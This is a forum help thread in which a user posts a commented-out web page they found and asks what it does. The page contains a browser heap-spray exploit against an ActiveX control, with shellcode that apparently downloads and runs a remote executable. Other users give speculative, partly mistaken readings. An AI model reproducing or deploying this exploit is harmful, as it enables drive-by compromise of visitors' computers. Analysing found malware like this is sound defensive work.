What is this script doing?

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • VickyVirgo2k
    New Member
    • Oct 2006
    • 1

    What is this script doing?

    Could someone please give me some idea what this script is doing.

    It might be some malicious script that might have been used to spread virus or to hack username/ password, hence it has been ### so that it can't be run by default.

    thanks.
    Vicky

    <!-- <html>
    ###<body>
    ###<script>
    ### var heapSprayToAddr ess = 0x05050505;
    ### var shellcode = unescape("%u909 0"+"%u9090"+
    ###"%u54eb%u758 b%u8b3c%u3574%u 0378%u56f5%u768 b%u0320" +
    ###"%u33f5%u49c 9%uad41%udb33%u 0f36%u14be%u382 8%u74f2" +
    ###"%uc108%u0dc b%uda03%ueb40%u 3bef%u75df%u5ee 7%u5e8b" +
    ###"%u0324%u66d d%u0c8b%u8b4b%u 1c5e%udd03%u048 b%u038b" +
    ###"%uc3c5%u727 5%u6d6c%u6e6f%u 642e%u6c6c%u430 0%u5c3a" +
    ###"%u2e55%u786 5%u0065%uc033%u 0364%u3040%u0c7 8%u408b" +
    ###"%u8b0c%u1c7 0%u8bad%u0840%u 09eb%u408b%u8d3 4%u7c40" +
    ###"%u408b%u953 c%u8ebf%u0e4e%u e8ec%uff84%ufff f%uec83" +
    ###"%u8304%u242 c%uff3c%u95d0%u bf50%u1a36%u702 f%u6fe8" +
    ###"%uffff%u8bf f%u2454%u8dfc%u ba52%udb33%u535 3%ueb52" +
    ###"%u5324%ud0f f%ubf5d%ufe98%u 0e8a%u53e8%ufff f%u83ff" +
    ###"%u04ec%u2c8 3%u6224%ud0ff%u 7ebf%ue2d8%ue87 3%uff40" +
    ###"%uffff%uff5 2%ue8d0%uffd7%u ffff%u7468%u707 4%u2f3a" +
    ###"%u6d2f%u686 f%u6973%u776e%u 6265%u6973%u657 4%u632e" +
    ###"%u2e6f%u6b7 5%u622f%u6e69%u 3264%u652e%u657 8%u0000");
    ###var heapBlockSize = 0x400000;
    ###var payLoadSize = shellcode.lengt h * 2;
    ###var spraySlideSize = heapBlockSize - (payLoadSize+0x 38);
    ###var spraySlide = unescape("%u050 5%u0505");
    ###spraySlide = getSpraySlide(s praySlide,spray SlideSize);
    ###heapBlocks = (heapSprayToAdd ress - 0x400000)/heapBlockSize;
    ###memory = new Array();
    ###
    ###for (i=0;i<heapBloc ks;i++)
    ###{
    ### memory[i] = spraySlide + shellcode;
    ###}
    ###for ( i = 0 ; i < 128 ; i++)
    ###{
    ### try
    ### {
    ### var tar = new ActiveXObject(' WebViewFolderIc on.WebViewFolde rIcon.1');
    ### tar.setSlice(0x 7ffffffe, 0x05050505, 0x05050505,0x05 050505 );
    ### }
    ### catch(e){}
    ###}
    ###
    ###function getSpraySlide(s praySlide, spraySlideSize)
    ###{
    ### while (spraySlide.len gth*2<spraySlid eSize)
    ### {
    ### spraySlide += spraySlide;
    ### }
    ### spraySlide = spraySlide.subs tring(0,spraySl ideSize/2);
    ### return spraySlide;
    ###}
    ###
    ###</script>
    ###</body>
    ###</html>
    ### -->
  • YenRaven
    New Member
    • Oct 2006
    • 29

    #2
    can i ask where you got this. it dosent seem to be javascript at least nothing like what iv seen befor but id recongize a memory address anywhere. it seems to be sliceing and moveing ram. humm didnt know this was possible from a browser. does it even work?

    Comment

    • YenRaven
      New Member
      • Oct 2006
      • 29

      #3
      well with a little research i found this

      Beyond Security products offer simplified network and application security testing.



      looks like it is an attack. can you post where you found it?

      Comment

      • iam_clint
        Recognized Expert Top Contributor
        • Jul 2006
        • 1207

        #4
        邐邐哫疋謼㕴͸囵皋̠㏵䧉굁�༶ ᒾ㠨瓲섈෋�㯯痟廧庋̤曝ಋ譋 ᱞ�ҋ΋쏅牵浬湯搮汬䌀尺⹕硥e 쀳ͤ぀౸䂋謌ᱰ训ࡀ৫䂋贴籀䂋锼 躿๎ト茄␬\闐뽐ᨶ瀯濨诿⑔ 跼멒�卓匤탿뽝ﺘຊ叨菿Ӭⲃ戤 탿线`rᅲ瑨灴⼺洯桯楳睮 扥楳整挮⹯歵戯湩㉤ 攮數

        lmao thats unencoded ... looks like chinese to me! :p no clue what it does i don't believe its messing with memory but i could be wrong.

        Comment

        • YenRaven
          New Member
          • Oct 2006
          • 29

          #5
          Originally posted by iam_clint
          邐邐哫疋謼㕴͸囵皋̠㏵䧉굁�༶ ᒾ㠨瓲섈෋�㯯痟廧庋̤曝ಋ譋 ᱞ�ҋ΋쏅牵浬湯搮汬䌀尺⹕硥e 쀳ͤ぀౸䂋謌ᱰ训ࡀ৫䂋贴籀䂋锼 躿๎ト茄␬\闐뽐ᨶ瀯濨诿⑔ 跼멒�卓匤탿뽝ﺘຊ叨菿Ӭⲃ戤 탿线`rᅲ瑨灴⼺洯桯楳睮 扥楳整挮⹯歵戯湩㉤ 攮數

          lmao thats unencoded ... looks like chinese to me! :p no clue what it does i don't believe its messing with memory but i could be wrong.
          it seems what it does is cause a denial of service on the unsuspecting victums computer then executes some arbitray code to allow some hacker control over you r machine.

          Comment

          • iam_clint
            Recognized Expert Top Contributor
            • Jul 2006
            • 1207

            #6
            maybe but most people don't even allow activex controls..


            this script is useless throw it away.

            Comment

            • YenRaven
              New Member
              • Oct 2006
              • 29

              #7
              ahh yes but that is what the try catch is for it looks like. if your computer isnt set up to allow activeX controls automatically youll never know it was there.

              Comment

              • iam_clint
                Recognized Expert Top Contributor
                • Jul 2006
                • 1207

                #8
                http://72.14.203.104/search?q=cache: icHrjvjhWxQJ:ww w.xfocus.net/stardust/rss/st-exps.rss+javasc ript+0x7ffffffe &hl=en&gl=us&ct =clnk&cd=10

                Comment

                • iam_clint
                  Recognized Expert Top Contributor
                  • Jul 2006
                  • 1207

                  #9
                  what this script is trying todo is give you an overflow.... nothing special good luck messing with it.

                  Comment

                  Working...